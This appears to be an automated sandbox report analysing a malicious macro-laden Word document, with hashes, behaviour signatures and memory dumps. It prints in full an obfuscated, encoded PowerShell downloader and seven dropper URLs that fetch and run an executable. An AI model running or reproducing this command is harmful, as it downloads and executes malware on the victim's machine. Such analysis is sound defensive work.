Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 11:13

General

  • Target

    E2-20200929_221200.doc

  • Size

    130KB

  • MD5

    f4d94fe27c343894012a3c3ff9269c14

  • SHA1

    d37969e710474ef8cfac6552c42c5c8a245ea1e3

  • SHA256

    a7bac9b6662da2eb4c3fa6f12c10d790ab6b8ef1735241fcd2a4d35a152a8965

  • SHA512

    350b2dd5768d8184526e06b0fa4abfb1526a25010a25969b96833bb323774383812c47388d65a7a6af63e7ed29199d6d85fab698793f13357aa3a855bf01d92e

  • SSDEEP

    1536:TNVLAAAAcAAAAAUmPxwMddylbvuNm9F96qpQWAfjlyqV:TLAAAAcAAAAAUSxRYs4mLlyqV

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://trueteeshirt.com/wp-admin/5/

exe.dropper

https://nhaphomau.com/sa7/

exe.dropper

https://heck-electric.com/wp-includes/vUB/

exe.dropper

http://techinotification.com/wp-includes/ii1pd0x/

exe.dropper

http://editzarmy.com/journal/WinEA/

exe.dropper

https://noithatfhouse.com/wp-includes/g5JI21S/

exe.dropper

http://techitrends.com/wp-includes/qO/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\E2-20200929_221200.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2544
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2948
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABKADYAZQBvADQAMAA1AD0AKAAoACcAUAB5ACcAKwAnAHgAMQBnACcAKQArACcAeQA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAdQBTAGUAUgBwAFIAbwBmAGkATABlAFwAQQBiAEMAcQAwAEwANABcAFAARQBpAGsAcAA0AFQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIARQBjAHQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAFUAYABSAGkAYABUAFkAUAByAG8AdABPAGMAYABPAEwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAxADIAJwArACcALAAnACsAJwAgAHQAJwApACsAJwBsACcAKwAoACcAcwAxADEALAAnACsAJwAgACcAKwAnAHQAJwApACsAJwBsAHMAJwApADsAJABYADkAZgAzAG4AeQBlACAAPQAgACgAJwBQACcAKwAoACcAYwBjAGUAcwAnACsAJwB3ACcAKQArACgAJwAyADgAJwArACcAZgAnACkAKQA7ACQASABmAGoANABwAGUAcAA9ACgAJwBMAHQAJwArACgAJwB1ADIAJwArACcAZAAnACkAKwAnAGMAaQAnACkAOwAkAEcAOQA0ADgAawBzAGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAYwAnACsAKAAnAEUAUgBBACcAKwAnAGIAYwBxACcAKQArACgAJwAwAGwANAAnACsAJwBjAEUAJwApACsAKAAnAFIAUABlAGkAawAnACsAJwBwACcAKwAnADQAJwApACsAKAAnAHQAYwBFACcAKwAnAFIAJwApACkALgAiAHIARQBwAGwAQQBgAGMARQAiACgAKAAnAGMAJwArACcARQBSACcAKQAsACcAXAAnACkAKQArACQAWAA5AGYAMwBuAHkAZQArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFcAawB6AGMAcwA5AGwAPQAoACcAUgBtACcAKwAoACcAMgBvAGQAJwArACcAMgBlACcAKQApADsAJABFAHAAdQBtAGwAdwA2AD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMATABJAGUATgBUADsAJABJAHoAcwB1AHkAbQBxAD0AKAAoACcAaAB0AHQAcAAnACsAJwBzACcAKQArACgAJwA6AC8ALwB0AHIAdQAnACsAJwBlAHQAZQAnACsAJwBlAHMAJwArACcAaABpACcAKQArACgAJwByAHQALgBjAG8AbQAvACcAKwAnAHcAcAAtAGEAZABtACcAKwAnAGkAJwApACsAKAAnAG4AJwArACcALwA1AC8AJwApACsAKAAnACoAaAB0ACcAKwAnAHQAJwApACsAJwBwACcAKwAnAHMAOgAnACsAKAAnAC8ALwBuAGgAYQAnACsAJwBwACcAKQArACgAJwBoAG8AJwArACcAbQBhAHUALgBjAG8AJwApACsAJwBtACcAKwAnAC8AcwAnACsAKAAnAGEANwAvACcAKwAnACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AaAAnACsAJwBlAGMAJwApACsAJwBrAC0AJwArACgAJwBlAGwAJwArACcAZQAnACsAJwBjAHQAcgAnACkAKwAoACcAaQAnACsAJwBjAC4AYwAnACsAJwBvAG0ALwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAoACcAbAB1ACcAKwAnAGQAZQAnACkAKwAoACcAcwAvAHYAJwArACcAVQAnACkAKwAnAEIAJwArACgAJwAvACoAJwArACcAaAB0AHQAcAA6ACcAKwAnAC8ALwB0ACcAKQArACgAJwBlACcAKwAnAGMAaAAnACkAKwAoACcAaQBuACcAKwAnAG8AdAAnACsAJwBpAGYAaQBjAGEAdAAnACsAJwBpACcAKQArACgAJwBvACcAKwAnAG4ALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQBpACcAKwAnAG4AJwApACsAJwBjACcAKwAoACcAbAB1AGQAZQBzACcAKwAnAC8AJwApACsAKAAnAGkAaQAxACcAKwAnAHAAZAAnACkAKwAoACcAMAAnACsAJwB4AC8AKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcAAnACsAJwA6AC8ALwAnACsAJwBlAGQAaQB0AHoAYQByACcAKwAnAG0AeQAuACcAKQArACcAYwAnACsAJwBvACcAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAbwB1AHIAJwApACsAKAAnAG4AJwArACcAYQBsAC8AVwAnACkAKwAoACcAaQBuAEUAJwArACcAQQAvACcAKwAnACoAaAB0AHQAJwArACcAcABzACcAKwAnADoALwAvAG4AbwBpAHQAaAAnACsAJwBhACcAKQArACgAJwB0AGYAJwArACcAaABvAHUAcwAnACsAJwBlAC4AYwBvAG0AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AaQAnACkAKwAnAG4AJwArACgAJwBjACcAKwAnAGwAdQBkAGUAcwAvACcAKQArACcAZwAnACsAKAAnADUASgBJADIAMQBTAC8AKgAnACsAJwBoAHQAJwArACcAdABwACcAKQArACgAJwA6AC8AJwArACcALwB0AGUAYwBoAGkAdAAnACsAJwByAGUAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGkAbgBjAGwAdQAnACkAKwAnAGQAZQAnACsAKAAnAHMALwAnACsAJwBxAE8ALwAnACkAKQAuACIAcwBQAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABHAHkAeQB5AHYANABqAD0AKAAoACcASQAnACsAJwB4AGkAJwApACsAJwBsACcAKwAoACcAbgAnACsAJwA3AF8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABQADEAMABjAGcAdgBjACAAaQBuACAAJABJAHoAcwB1AHkAbQBxACkAewB0AHIAeQB7ACQARQBwAHUAbQBsAHcANgAuACIARABPAGAAdwBOAGwATwBhAGAARABgAEYAaQBMAGUAIgAoACQAUAAxADAAYwBnAHYAYwAsACAAJABHADkANAA4AGsAcwBkACkAOwAkAFgAagAzAHIAaQBjAHkAPQAoACcAVgAnACsAKAAnAF8AJwArACcAZQAnACsAJwBjAG4AYQByACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEcAOQA0ADgAawBzAGQAKQAuACIAbABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMANAAwADkAOQApACAAewAuACgAJwBJACcAKwAnAG4AJwArACcAdgBvAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABHADkANAA4AGsAcwBkACkAOwAkAEoAcwBwAG8AdQB5AGMAPQAoACgAJwBFACcAKwAnADMANgB6AF8AJwApACsAJwA5ACcAKwAnADUAJwApADsAYgByAGUAYQBrADsAJABUAHIANQAwAHkAMABnAD0AKAAoACcASAA1ACcAKwAnAHcAeQBnACcAKQArACcAZgBsACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgA4AGEAbgB1AHcAbgA9ACgAKAAnAFIAJwArACcAcQBjAGwAJwApACsAJwA0ACcAKwAnAHoANgAnACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2692

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2544-38-0x0000000005980000-0x0000000005A80000-memory.dmp

      Filesize

      1024KB

    • memory/2544-19-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-2-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/2544-6-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-7-0x00000000063A0000-0x00000000064A0000-memory.dmp

      Filesize

      1024KB

    • memory/2544-8-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-9-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-11-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-10-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-5-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-29-0x0000000005980000-0x0000000005A80000-memory.dmp

      Filesize

      1024KB

    • memory/2544-23-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-21-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-20-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-12-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-17-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-16-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-15-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2544-14-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-49-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/2544-35-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-43-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-42-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-50-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-0-0x000000002F4D1000-0x000000002F4D2000-memory.dmp

      Filesize

      4KB

    • memory/2544-48-0x0000000005980000-0x0000000005A80000-memory.dmp

      Filesize

      1024KB

    • memory/2544-47-0x0000000005980000-0x0000000005A80000-memory.dmp

      Filesize

      1024KB

    • memory/2544-41-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-39-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-62-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-33-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-61-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-32-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-30-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-58-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-59-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2544-60-0x0000000005980000-0x0000000005A80000-memory.dmp

      Filesize

      1024KB

    • memory/2692-57-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

      Filesize

      32KB

    • memory/2692-56-0x000000001B810000-0x000000001BAF2000-memory.dmp

      Filesize

      2.9MB